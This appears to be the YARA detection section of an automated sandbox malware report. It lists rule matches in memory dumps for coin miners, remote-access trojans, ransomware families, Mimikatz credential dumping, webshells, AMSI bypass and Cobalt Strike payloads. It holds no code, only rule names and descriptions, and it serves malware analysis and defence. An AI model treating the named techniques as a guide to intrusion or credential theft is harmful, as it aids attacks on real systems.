                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6306591281.0000028BD7440000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6340321135.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter
                                                                                                                              • Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6332134086.0000028BD7440000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6266904104.0000028BD642E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth)
                                                                                                                              • Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
                                                                                                                              • Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6336368207.0000028BD7C4C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: HackTool_Samples, Description: Hacktool, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: unknown
                                                                                                                              • Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6329904387.0000028BD62AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6272308582.0000028BD6A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_jsp_by_string, Description: JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, Author: Cylance
                                                                                                                              • Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Ammyy_Admin_AA_v3, Description: Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_base64_encoded_payloads, Description: php webshell containing base64 encoded payload, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_hidden_tear, Description: Yara detected HiddenTear ransomware, Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Growtopia, Description: Yara detected Growtopia, Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6323124773.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: HackTool_MSIL_SharPersist_2, Description: unknown, Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth)
                                                                                                                              • Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Florian Roth
